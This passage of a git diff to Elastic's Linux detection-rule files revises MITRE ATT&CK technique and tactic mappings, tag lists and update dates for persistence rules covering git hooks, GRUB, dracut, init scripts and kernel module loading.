"Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_dpkg_unusual_execution.toml b/rules/linux/persistence_dpkg_unusual_execution.toml index 41b46686434..73a6322b954 100644 --- a/rules/linux/persistence_dpkg_unusual_execution.toml +++ b/rules/linux/persistence_dpkg_unusual_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -78,7 +78,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,6 +112,16 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -114,16 +131,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +name = "Initial Access" +id = "TA0001" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_dracut_module_creation.toml b/rules/linux/persistence_dracut_module_creation.toml index d0e21bd892a..9427236d5fb 100644 --- a/rules/linux/persistence_dracut_module_creation.toml +++ b/rules/linux/persistence_dracut_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -76,7 +76,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,7 +128,43 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml index 93e45dc6fa5..2dcef6e4fb8 100644 --- a/rules/linux/persistence_dynamic_linker_backup.toml +++ b/rules/linux/persistence_dynamic_linker_backup.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/12" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/17" [transform] [[transform.osquery]] @@ -153,7 +153,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Orbit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by process.entity_id with maxspan=1m @@ -183,21 +192,3 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_extract_initramfs_via_cpio.toml b/rules/linux/persistence_extract_initramfs_via_cpio.toml index e22479339de..3116b612026 100644 --- a/rules/linux/persistence_extract_initramfs_via_cpio.toml +++ b/rules/linux/persistence_extract_initramfs_via_cpio.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -122,6 +122,16 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml index 2406032af88..55473220b03 100644 --- a/rules/linux/persistence_git_hook_execution.toml +++ b/rules/linux/persistence_git_hook_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -83,7 +83,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] type = "eql" query = ''' sequence by host.id with maxspan=3s @@ -98,6 +109,24 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -116,12 +145,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_git_hook_file_creation.toml b/rules/linux/persistence_git_hook_file_creation.toml index 10d5c0ad0dd..c5b9d78a19a 100644 --- a/rules/linux/persistence_git_hook_file_creation.toml +++ b/rules/linux/persistence_git_hook_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -84,7 +84,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,11 +125,42 @@ file.extension == null and process.executable != null and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml index b1d7c9ec078..3c79ca6de78 100644 --- a/rules/linux/persistence_git_hook_netcon.toml +++ b/rules/linux/persistence_git_hook_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -85,7 +85,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=3s @@ -110,14 +119,19 @@ sequence by host.id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -140,12 +154,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml index eaaeea7afa9..2203dc37a30 100644 --- a/rules/linux/persistence_git_hook_process_execution.toml +++ b/rules/linux/persistence_git_hook_process_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -89,7 +89,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,6 +127,24 @@ not process.name in ("git", "dirname") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -133,12 +163,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_grub_configuration_creation.toml b/rules/linux/persistence_grub_configuration_creation.toml index 0e3eb428f97..d3c5b78af10 100644 --- a/rules/linux/persistence_grub_configuration_creation.toml +++ b/rules/linux/persistence_grub_configuration_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -76,7 +76,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -118,6 +129,16 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_grub_makeconfig.toml b/rules/linux/persistence_grub_makeconfig.toml index 7bdd557c7ce..dc757627521 100644 --- a/rules/linux/persistence_grub_makeconfig.toml +++ b/rules/linux/persistence_grub_makeconfig.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -119,6 +119,16 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_init_d_file_creation.toml b/rules/linux/persistence_init_d_file_creation.toml index 1285bab4907..b4d7276cf08 100644 --- a/rules/linux/persistence_init_d_file_creation.toml +++ b/rules/linux/persistence_init_d_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -192,11 +192,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml index 92ea71412a6..b0fd18bbca5 100644 --- a/rules/linux/persistence_insmod_kernel_module_load.toml +++ b/rules/linux/persistence_insmod_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [transform] [[transform.osquery]] @@ -192,19 +192,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -219,3 +206,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml index 9edc27b511d..58550c3b588 100644 --- a/rules/linux/persistence_kde_autostart_modification.toml +++ b/rules/linux/persistence_kde_autostart_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/06" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -243,11 +243,6 @@ id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.013" -name = "XDG Autostart Entries" -reference = "https://attack.mitre.org/techniques/T1547/013/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml index a705e1909cf..0f7b646be9e 100644 --- a/rules/linux/persistence_kernel_driver_load.toml +++ b/rules/linux/persistence_kernel_driver_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -96,31 +96,31 @@ Kernel modules extend the functionality of the Linux kernel, allowing dynamic lo [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.006" name = "Kernel Modules and Extensions" reference = "https://attack.mitre.org/techniques/T1547/006/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml index 264a2ebba28..9f4a8303937 100644 --- a/rules/linux/persistence_kernel_driver_load_by_non_root.toml +++ b/rules/linux/persistence_kernel_driver_load_by_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -101,19 +101,6 @@ auditd.data.syscall in ("init_module", "finit_module") and user.id != "0" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -128,3 +115,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml index 474b8cef8fd..6a383383172 100644 --- a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml +++ b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/13" [rule] author = ["Elastic"] @@ -118,19 +118,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -145,3 +132,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_object_file_creation.toml b/rules/linux/persistence_kernel_object_file_creation.toml index eed8a4ed3c7..e5b8aede59e 100644 --- a/rules/linux/persistence_kernel_object_file_creation.toml +++ b/rules/linux/persistence_kernel_object_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -121,19 +129,15 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml index 60a4a084698..59a33614ada 100644 --- a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml +++ b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -121,6 +121,16 @@ id = "T1543.005" name = "Container Service" reference = "https://attack.mitre.org/techniques/T1543/005/" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.007" +name = "Container Orchestration Job" +reference = "https://attack.mitre.org/techniques/T1053/007/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml index 5fb2a701f22..428a388aa15 100644 --- a/rules/linux/persistence_kworker_file_creation.toml +++ b/rules/linux/persistence_kworker_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -152,7 +152,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper 